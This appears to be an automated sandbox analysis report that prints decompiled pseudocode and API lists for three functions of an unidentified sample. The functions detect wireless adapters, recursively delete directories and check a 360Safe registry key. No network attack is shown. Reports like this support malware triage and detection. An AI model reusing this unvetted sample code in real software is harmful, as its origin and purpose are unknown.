                                                                                                                                                                                          • Instruction ID: e55bd5198704bb51d6ca9abf70ce4b92334d63bc24de8c8fea1387202447494f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cdfaeb8e946e1f1da92fd3306329d79d07c563ab444c9f92b2ce2b513b9608b
                                                                                                                                                                                          • Instruction Fuzzy Hash: E3318471A1A21C9BDF31EBB89C4DAEE7BBCEF05714F50051AE424E3181E7219648CEB1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C940A0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 88registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                          			E00C940A0(int __ecx, void* __ebp, void* __eflags, intOrPtr* _a4) {
				signed int _v4;
				char _v528;
				short _v532;
				int _v536;
				intOrPtr* _v540;
				void* _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t26;
				void* _t41;
				WCHAR* _t47;
				WCHAR* _t50;

				_t53 =  &_v544;
				_t26 =  *0xd64070; // 0x8a9e1774
				_v4 = _t26 ^  &_v544;
				_t41 = __ecx;
				_t49 =  &_v544;
				_t50 =  &_v528;
				_v540 = _a4;
				_v544 = 0x104;
				_v536 = __ecx;
				_v532 = 0;
				if(E00C92550( &_v544, _t50,  &_v536, L"DriverDesc") != 0) {
					L3:
					if( *_v540 != 0) {
						L11:
						return E00D0071A(1, _t41, _v4 ^ _t53, _t48, _t49, _t50);
					}
					_t48 =  &_v544;
					_v536 = 0;
					_v532 = 0;
					_v544 = 0;
					if(RegOpenKeyExW(_t41, L"NDI\\Interfaces", 0, 1,  &_v544) != 0) {
						goto L11;
					}
					_t41 = _v544;
					_t49 =  &_v544;
					_t50 =  &_v528;
					_v536 = _t41;
					_v532 = 0;
					_v544 = 0x104;
					if(E00C92550( &_v544, _t50,  &_v536, L"LowerRange") != 0) {
						L9:
						if(_t41 != 0) {
							RegCloseKey(_t41);
						}
						goto L11;
					}
					_t47 = _t50;
					_t50 = StrStrIW;
					if(StrStrIW(_t47, L"wlan") != 0) {
						L8:
						 *_v544 = 1;
						goto L9;
					}
					_t48 =  &_v532;
					if(StrStrIW( &_v532, L"vwifi") == 0) {
						goto L9;
					}
					goto L8;
				}
				_t48 = _t50;
				if(StrStrIW(_t50, L"Wireless") == 0) {
					goto L3;
				}
				 *_v544 = 1;
				goto L11;
			}
















                                                                                                                                                                                          0x00c940a0
                                                                                                                                                                                          0x00c940a6
                                                                                                                                                                                          0x00c940ad
                                                                                                                                                                                          0x00c940bf
                                                                                                                                                                                          0x00c940cd
                                                                                                                                                                                          0x00c940d1
                                                                                                                                                                                          0x00c940d5
                                                                                                                                                                                          0x00c940d9
                                                                                                                                                                                          0x00c940e1
                                                                                                                                                                                          0x00c940e5
                                                                                                                                                                                          0x00c940f0
                                                                                                                                                                                          0x00c94113
                                                                                                                                                                                          0x00c94119
                                                                                                                                                                                          0x00c941ab
                                                                                                                                                                                          0x00c941c8
                                                                                                                                                                                          0x00c941c8
                                                                                                                                                                                          0x00c9411f
                                                                                                                                                                                          0x00c9412d
                                                                                                                                                                                          0x00c94131
                                                                                                                                                                                          0x00c94135
                                                                                                                                                                                          0x00c94141
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94143
                                                                                                                                                                                          0x00c94151
                                                                                                                                                                                          0x00c94155
                                                                                                                                                                                          0x00c94159
                                                                                                                                                                                          0x00c9415d
                                                                                                                                                                                          0x00c94161
                                                                                                                                                                                          0x00c94170
                                                                                                                                                                                          0x00c941a0
                                                                                                                                                                                          0x00c941a2
                                                                                                                                                                                          0x00c941a5
                                                                                                                                                                                          0x00c941a5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c941a2
                                                                                                                                                                                          0x00c94172
                                                                                                                                                                                          0x00c94174
                                                                                                                                                                                          0x00c94184
                                                                                                                                                                                          0x00c94196
                                                                                                                                                                                          0x00c9419a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9419a
                                                                                                                                                                                          0x00c9418b
                                                                                                                                                                                          0x00c94194
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94194
                                                                                                                                                                                          0x00c940f7
                                                                                                                                                                                          0x00c94102
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c94108
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C92550: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00C90027), ref: 00C92577
                                                                                                                                                                                          • StrStrIW.SHLWAPI(?,Wireless), ref: 00C940FA
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(?,NDI\Interfaces,00000000,00000001,?), ref: 00C94139
                                                                                                                                                                                          • StrStrIW.SHLWAPI(?,wlan,?,LowerRange), ref: 00C94180
                                                                                                                                                                                          • StrStrIW.SHLWAPI(?,vwifi), ref: 00C94190
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,LowerRange), ref: 00C941A5
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                                                                                                          • String ID: DriverDesc$LowerRange$NDI\Interfaces$Wireless$vwifi$wlan
                                                                                                                                                                                          • API String ID: 3677997916-590455766
                                                                                                                                                                                          • Opcode ID: f7b1dcb5267c4204ab47996d17cb63006a5b3d918ddfef41573d4ba151c4942d
                                                                                                                                                                                          • Instruction ID: 4711df2b083a0e7f83a5c0f4ed264d5cf3d24d8459468a09c4804101e7c1d4e1
                                                                                                                                                                                          • Opcode Fuzzy Hash: f7b1dcb5267c4204ab47996d17cb63006a5b3d918ddfef41573d4ba151c4942d
                                                                                                                                                                                          • Instruction Fuzzy Hash: A83191B16083059FDB14DF55DC88E5FBBE4FB98744F40091DF589A3240D7B4EA4A8BA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CE83AC Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 145fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                          			E00CE83AC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t37;
				WCHAR* _t41;
				void* _t43;
				short _t44;
				void* _t57;
				void* _t59;
				void* _t64;
				WCHAR* _t72;
				WCHAR* _t84;
				void* _t85;
				char* _t86;
				void* _t101;
				void* _t103;
				void* _t107;
				signed int _t109;
				void* _t111;
				void* _t112;
				void* _t114;

				_t101 = __edx;
				_t112 = _t111 - 0x914;
				_t109 = _t112 - 4;
				_t37 =  *0xd64070; // 0x8a9e1774
				 *(_t109 + 0x914) = _t37 ^ _t109;
				_push(0xc);
				E00D0155A(0xd37507, __ebx, __edi, __esi);
				_t84 =  *(_t109 + 0x920);
				 *(_t109 - 0x10) = _t84;
				if(_t84 == 0) {
					L12:
					_t41 = 0;
					__eflags = 0;
					L13:
					 *[fs:0x0] =  *((intOrPtr*)(_t109 - 0xc));
					_pop(_t103);
					_pop(_t107);
					_pop(_t85);
					return E00D0071A(_t41, _t85,  *(_t109 + 0x914) ^ _t109, _t101, _t103, _t107);
				}
				_t43 = E00D00EBB(_t84);
				_t117 = _t43;
				if(_t43 == 0) {
					goto L12;
				}
				_t44 = 0x5c;
				 *((short*)(_t109 + 0x458)) = _t44;
				 *((intOrPtr*)(_t109 + 0x45c)) = 0;
				 *((intOrPtr*)(_t109 + 0x460)) = 0;
				 *((short*)(_t109 + 0x5f4)) = 0;
				 *((intOrPtr*)(_t109 - 4)) = 0;
				E00D006A0(0x18e, _t109 + 0x5f6, 0, 0x18e);
				E00CC6919(_t109 + 0x5f4, 0x190, L"%s\\*.*", _t84);
				_t114 = _t112 + 0x1c;
				if(E00CDCF38(_t109, 0x18e, _t117, _t109 + 0x5f4) == 0) {
					L11:
					E00CDC813(_t109);
					RemoveDirectoryW(_t84);
					E00CDC813(_t109);
					_t41 = 1;
					goto L13;
				} else {
					_t86 = L"%s\\%s";
					do {
						 *((intOrPtr*)(_t109 - 0x18)) = E00CDC7EC(_t109);
						_t57 = E00CDCEFB(_t109);
						_t119 = _t57;
						if(_t57 == 0) {
							_push(_t109 - 0x14);
							_t59 = E00CDE1F1(_t86, _t109, 0x18e, 0x190, _t119);
							_push(0xc8);
							 *((char*)(_t109 - 4)) = 1;
							E00C8E570(_t109 + 0x464, 0x190, E00C99832(_t59, _t101));
							 *((char*)(_t109 - 4)) = 0;
							E00C9820F(_t109 - 0x14);
							_t64 = E00CDC7C8(_t109, 0x10);
							_push(0x18e);
							_push(0);
							_t120 = _t64;
							if(_t64 == 0) {
								 *(_t109 + 0x784) = 0;
								_push(_t109 + 0x786);
								E00D006A0(0x18e);
								_push(_t109 + 0x464);
								E00CC6919(_t109 + 0x784, 0x190, _t86,  *(_t109 - 0x10));
								_t114 = _t114 + 0x20;
								_t72 = DeleteFileW(_t109 + 0x784);
								__eflags = _t72;
								if(_t72 == 0) {
									MoveFileExW(_t109 + 0x784, _t72, 4);
								}
							} else {
								 *(_t109 + 0x784) = 0;
								_push(_t109 + 0x786);
								E00D006A0(0x18e);
								_push(_t109 + 0x464);
								E00CC6919(_t109 + 0x784, 0x190, _t86,  *(_t109 - 0x10));
								_push(_t109 + 0x784);
								E00CE83AC(_t86, _t101, 0x18e, 0x190, _t120);
								_t114 = _t114 + 0x24;
							}
						}
					} while ( *((intOrPtr*)(_t109 - 0x18)) != 0);
					_t84 =  *(_t109 - 0x10);
					goto L11;
				}
			}






















                                                                                                                                                                                          0x00ce83ac
                                                                                                                                                                                          0x00ce83ad
                                                                                                                                                                                          0x00ce83b3
                                                                                                                                                                                          0x00ce83b7
                                                                                                                                                                                          0x00ce83be
                                                                                                                                                                                          0x00ce83c4
                                                                                                                                                                                          0x00ce83cb
                                                                                                                                                                                          0x00ce83d0
                                                                                                                                                                                          0x00ce83d8
                                                                                                                                                                                          0x00ce83dd
                                                                                                                                                                                          0x00ce8576
                                                                                                                                                                                          0x00ce8576
                                                                                                                                                                                          0x00ce8576
                                                                                                                                                                                          0x00ce8578
                                                                                                                                                                                          0x00ce857b
                                                                                                                                                                                          0x00ce8583
                                                                                                                                                                                          0x00ce8584
                                                                                                                                                                                          0x00ce8585
                                                                                                                                                                                          0x00ce859a
                                                                                                                                                                                          0x00ce859a
                                                                                                                                                                                          0x00ce83e4
                                                                                                                                                                                          0x00ce83ea
                                                                                                                                                                                          0x00ce83ec
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ce83f4
                                                                                                                                                                                          0x00ce83f5
                                                                                                                                                                                          0x00ce83fc
                                                                                                                                                                                          0x00ce8402
                                                                                                                                                                                          0x00ce8410
                                                                                                                                                                                          0x00ce841f
                                                                                                                                                                                          0x00ce8422
                                                                                                                                                                                          0x00ce8438
                                                                                                                                                                                          0x00ce843d
                                                                                                                                                                                          0x00ce8451
                                                                                                                                                                                          0x00ce855a
                                                                                                                                                                                          0x00ce855d
                                                                                                                                                                                          0x00ce8563
                                                                                                                                                                                          0x00ce856c
                                                                                                                                                                                          0x00ce8573
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ce8457
                                                                                                                                                                                          0x00ce8457
                                                                                                                                                                                          0x00ce845c
                                                                                                                                                                                          0x00ce8467
                                                                                                                                                                                          0x00ce846a
                                                                                                                                                                                          0x00ce846f
                                                                                                                                                                                          0x00ce8471
                                                                                                                                                                                          0x00ce847a
                                                                                                                                                                                          0x00ce847e
                                                                                                                                                                                          0x00ce8483
                                                                                                                                                                                          0x00ce848a
                                                                                                                                                                                          0x00ce849c
                                                                                                                                                                                          0x00ce84a4
                                                                                                                                                                                          0x00ce84a8
                                                                                                                                                                                          0x00ce84b2
                                                                                                                                                                                          0x00ce84b7
                                                                                                                                                                                          0x00ce84b8
                                                                                                                                                                                          0x00ce84ba
                                                                                                                                                                                          0x00ce84bc
                                                                                                                                                                                          0x00ce84fe
                                                                                                                                                                                          0x00ce850b
                                                                                                                                                                                          0x00ce850c
                                                                                                                                                                                          0x00ce8517
                                                                                                                                                                                          0x00ce8524
                                                                                                                                                                                          0x00ce8529
                                                                                                                                                                                          0x00ce8533
                                                                                                                                                                                          0x00ce8539
                                                                                                                                                                                          0x00ce853b
                                                                                                                                                                                          0x00ce8547
                                                                                                                                                                                          0x00ce8547
                                                                                                                                                                                          0x00ce84be
                                                                                                                                                                                          0x00ce84c0
                                                                                                                                                                                          0x00ce84cd
                                                                                                                                                                                          0x00ce84ce
                                                                                                                                                                                          0x00ce84d9
                                                                                                                                                                                          0x00ce84e6
                                                                                                                                                                                          0x00ce84f1
                                                                                                                                                                                          0x00ce84f2
                                                                                                                                                                                          0x00ce84f7
                                                                                                                                                                                          0x00ce84f7
                                                                                                                                                                                          0x00ce84bc
                                                                                                                                                                                          0x00ce854d
                                                                                                                                                                                          0x00ce8557
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ce8557

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CE83CB
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 00CE83E4
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CE8422
                                                                                                                                                                                            • Part of subcall function 00CC6919: _vswprintf_s.LIBCMT ref: 00CC694C
                                                                                                                                                                                            • Part of subcall function 00CDCF38: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00CDCF64
                                                                                                                                                                                            • Part of subcall function 00CDCF38: GetFullPathNameW.KERNEL32(?,00000104,?,00000000,0000018E,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00CDCF81
                                                                                                                                                                                            • Part of subcall function 00CDCF38: SetLastError.KERNEL32(0000007B,?,?,?,?,?,?,?,?,?,?,0000000C), ref: 00CDCF94
                                                                                                                                                                                          • RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,0000000C), ref: 00CE8563
                                                                                                                                                                                            • Part of subcall function 00CDE1F1: __EH_prolog3.LIBCMT ref: 00CDE1F8
                                                                                                                                                                                            • Part of subcall function 00C9820F: InterlockedDecrement.KERNEL32 ref: 00C98223
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CE84CE
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CE850C
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000010,?,?,?,?,?,?,?,?,0000000C), ref: 00CE8533
                                                                                                                                                                                          • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,?,00000010,?,?), ref: 00CE8547
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File_memset$H_prolog3$DecrementDeleteDirectoryErrorFindFirstFullInterlockedLastMoveNamePathRemove_vswprintf_s_wcslen
                                                                                                                                                                                          • String ID: %s\%s$%s\*.*
                                                                                                                                                                                          • API String ID: 1472431872-1665845743
                                                                                                                                                                                          • Opcode ID: 5fa967723d02887d523e25e1800e0c8f7ebd0a2171d2c07c73536620be2c1f9a
                                                                                                                                                                                          • Instruction ID: c3d5b66d801a427cd0696324b5a680362b96f7220613783261a7b3afdaca03c2
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fa967723d02887d523e25e1800e0c8f7ebd0a2171d2c07c73536620be2c1f9a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 56511F7194028AAADF20EFA5CD85BEE77ACEF05704F40442AB90DD7182EF749704DB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8FF60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 62%
                                                                                                                                                                                          			E00C8FF60(void* __ebp, intOrPtr _a4, intOrPtr* _a8) {
				char _v4;
				char _v12;
				signed int _v16;
				char _v36;
				char _v120;
				intOrPtr _v124;
				int _v128;
				int _v132;
				char _v136;
				void* _v140;
				char _v144;
				void* _v148;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t47;
				signed int _t49;
				void* _t54;
				char _t55;
				intOrPtr* _t69;
				intOrPtr* _t74;
				void* _t75;
				int _t80;
				void* _t81;
				intOrPtr _t83;
				WCHAR* _t94;
				intOrPtr _t99;
				signed int _t100;
				void* _t103;
				void* _t104;
				void* _t109;
				intOrPtr* _t113;
				void* _t115;
				signed int _t116;

				_push(0xffffffff);
				_push(0xd38db6);
				_push( *[fs:0x0]);
				_t116 = _t115 - 0x84;
				_t47 =  *0xd64070; // 0x8a9e1774
				_v16 = _t47 ^ _t116;
				_push(_t103);
				_t49 =  *0xd64070; // 0x8a9e1774
				_push(_t49 ^ _t116);
				 *[fs:0x0] =  &_v12;
				_t113 = _a8;
				_t80 = 0;
				_v124 = _a4;
				 *_t113 = 0;
				_v132 = 0;
				_v128 = 0;
				_v4 = 0;
				_v140 = 0;
				if(RegOpenKeyExW(0x80000002, L"SOFTWARE\\360Safe\\Liveup", 0, 0x201,  &_v140) != 0) {
					L14:
					_v4 = 0xffffffff;
					_t54 = _v132;
					if(_t54 != _t80) {
						RegCloseKey(_t54);
					}
					_t55 = 0;
				} else {
					_t98 = _v140;
					_v132 = _v140;
					_v128 = 0x200;
					E00D006A0(_t103,  &_v120, 0, 0x64);
					_t116 = _t116 + 0xc;
					_v144 = 0x32;
					if(E00C92550( &_v144,  &_v120,  &_v132, L"m2") != 0 || _v144 != 0x2d) {
						goto L14;
					} else {
						_t99 =  *0xd68c98; // 0xd46f14
						_t20 = _t99 + 0xc; // 0xd2f706
						_v144 =  *((intOrPtr*)( *_t20))() + 0x10;
						_v4 = 1;
						E00C90BB0( &_v144,  &_v120);
						_t100 =  &_v36;
						_v136 = 0;
						E00D06DFD(_t100, L"%x",  &_v136);
						_t83 = _v144;
						_t116 = _t116 + 0xc;
						if(_v136 != (E00C8FED0(_t83, 0x2a) & 0x000000ff)) {
							_t69 = _t83 - 0x10;
							_v4 = 0;
							asm("lock xadd [ecx], edx");
							_t98 = (_t100 | 0xffffffff) - 1;
							if((_t100 | 0xffffffff) - 1 <= 0) {
								_t98 =  *((intOrPtr*)( *_t69));
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t69)) + 4))))(_t69);
							}
							_t80 = 0;
							goto L14;
						} else {
							E00C90DF0( &_v136,  &_v120, _v124, 0x2a);
							_t94 =  &_v120;
							if(StrCmpNIW(_t94, L"ffffffff", 8) == 0) {
								 *_t113 = 1;
							}
							_t74 = _t83 - 0x10;
							_v12 = 0;
							_t34 = _t74 + 0xc; // 0xc8ef47
							_t98 = _t34;
							asm("lock xadd [edx], ecx");
							if((_t94 | 0xffffffff) - 1 <= 0) {
								_t98 =  *((intOrPtr*)( *_t74));
								_t35 = _t98 + 4; // 0x3300d3a3
								 *((intOrPtr*)( *_t35))(_t74);
							}
							_v12 = 0xffffffff;
							_t75 = _v148;
							if(_t75 != 0) {
								RegCloseKey(_t75);
							}
							_t55 = 1;
						}
					}
				}
				 *[fs:0x0] = _v12;
				_pop(_t104);
				_pop(_t109);
				_pop(_t81);
				return E00D0071A(_t55, _t81, _v16 ^ _t116, _t98, _t104, _t109);
			}





































                                                                                                                                                                                          0x00c8ff60
                                                                                                                                                                                          0x00c8ff62
                                                                                                                                                                                          0x00c8ff6d
                                                                                                                                                                                          0x00c8ff6e
                                                                                                                                                                                          0x00c8ff74
                                                                                                                                                                                          0x00c8ff7b
                                                                                                                                                                                          0x00c8ff85
                                                                                                                                                                                          0x00c8ff86
                                                                                                                                                                                          0x00c8ff8d
                                                                                                                                                                                          0x00c8ff95
                                                                                                                                                                                          0x00c8ffa2
                                                                                                                                                                                          0x00c8ffa9
                                                                                                                                                                                          0x00c8ffab
                                                                                                                                                                                          0x00c8ffaf
                                                                                                                                                                                          0x00c8ffb2
                                                                                                                                                                                          0x00c8ffb6
                                                                                                                                                                                          0x00c8ffca
                                                                                                                                                                                          0x00c8ffd6
                                                                                                                                                                                          0x00c8ffe2
                                                                                                                                                                                          0x00c90134
                                                                                                                                                                                          0x00c90134
                                                                                                                                                                                          0x00c9013f
                                                                                                                                                                                          0x00c90145
                                                                                                                                                                                          0x00c90148
                                                                                                                                                                                          0x00c90148
                                                                                                                                                                                          0x00c9014e
                                                                                                                                                                                          0x00c8ffe8
                                                                                                                                                                                          0x00c8ffe8
                                                                                                                                                                                          0x00c8fff4
                                                                                                                                                                                          0x00c8fff8
                                                                                                                                                                                          0x00c90000
                                                                                                                                                                                          0x00c90005
                                                                                                                                                                                          0x00c9001a
                                                                                                                                                                                          0x00c90029
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9003a
                                                                                                                                                                                          0x00c9003a
                                                                                                                                                                                          0x00c90040
                                                                                                                                                                                          0x00c9004d
                                                                                                                                                                                          0x00c90057
                                                                                                                                                                                          0x00c9005f
                                                                                                                                                                                          0x00c90069
                                                                                                                                                                                          0x00c90076
                                                                                                                                                                                          0x00c9007e
                                                                                                                                                                                          0x00c90083
                                                                                                                                                                                          0x00c90087
                                                                                                                                                                                          0x00c9009d
                                                                                                                                                                                          0x00c9010e
                                                                                                                                                                                          0x00c90111
                                                                                                                                                                                          0x00c9011f
                                                                                                                                                                                          0x00c90123
                                                                                                                                                                                          0x00c90126
                                                                                                                                                                                          0x00c9012a
                                                                                                                                                                                          0x00c90130
                                                                                                                                                                                          0x00c90130
                                                                                                                                                                                          0x00c90132
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9009f
                                                                                                                                                                                          0x00c900a7
                                                                                                                                                                                          0x00c900b3
                                                                                                                                                                                          0x00c900c0
                                                                                                                                                                                          0x00c900c2
                                                                                                                                                                                          0x00c900c2
                                                                                                                                                                                          0x00c900c9
                                                                                                                                                                                          0x00c900cc
                                                                                                                                                                                          0x00c900d4
                                                                                                                                                                                          0x00c900d4
                                                                                                                                                                                          0x00c900da
                                                                                                                                                                                          0x00c900e1
                                                                                                                                                                                          0x00c900e5
                                                                                                                                                                                          0x00c900e8
                                                                                                                                                                                          0x00c900eb
                                                                                                                                                                                          0x00c900eb
                                                                                                                                                                                          0x00c900ed
                                                                                                                                                                                          0x00c900f8
                                                                                                                                                                                          0x00c900fe
                                                                                                                                                                                          0x00c90101
                                                                                                                                                                                          0x00c90101
                                                                                                                                                                                          0x00c90107
                                                                                                                                                                                          0x00c90107
                                                                                                                                                                                          0x00c9009d
                                                                                                                                                                                          0x00c90029
                                                                                                                                                                                          0x00c90157
                                                                                                                                                                                          0x00c9015f
                                                                                                                                                                                          0x00c90160
                                                                                                                                                                                          0x00c90162
                                                                                                                                                                                          0x00c90177

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\360Safe\Liveup,00000000,00000201,?,8A9E1774,00000000,?,?,00000000), ref: 00C8FFDA
                                                                                                                                                                                          • _memset.LIBCMT ref: 00C90000
                                                                                                                                                                                            • Part of subcall function 00C92550: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00C90027), ref: 00C92577
                                                                                                                                                                                            • Part of subcall function 00C90BB0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?,?,00C90064), ref: 00C90BCE
                                                                                                                                                                                            • Part of subcall function 00C90BB0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,-00000010,-00000001,00000000,00000000), ref: 00C90C05
                                                                                                                                                                                          • _swscanf.LIBCMT ref: 00C9007E
                                                                                                                                                                                            • Part of subcall function 00D06DFD: _vscan_fn.LIBCMT ref: 00D06E14
                                                                                                                                                                                          • StrCmpNIW.SHLWAPI(?,ffffffff,00000008,?,?,00D48AA8,00000064,?,00000000), ref: 00C900B8
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C90101
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00C90148
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ByteCharCloseMultiWide$OpenQueryValue_memset_swscanf_vscan_fn
                                                                                                                                                                                          • String ID: -$2$SOFTWARE\360Safe\Liveup$ffffffff
                                                                                                                                                                                          • API String ID: 3516239013-1203591585
                                                                                                                                                                                          • Opcode ID: 7397f3214bf78ca366b968e0c5703b0a38b2e9389bbeacb1825e4f57b84c7481
                                                                                                                                                                                          • Instruction ID: 8c506159e0e7b21dd90f834369bcc41c4c7d82ecc621d7766268cc2dc76709f7
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7397f3214bf78ca366b968e0c5703b0a38b2e9389bbeacb1825e4f57b84c7481
                                                                                                                                                                                          • Instruction Fuzzy Hash: D3518D712083419FD720DF28C889B5AB7E4FF89324F508A2DF5A9D7291DB749909CB62
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

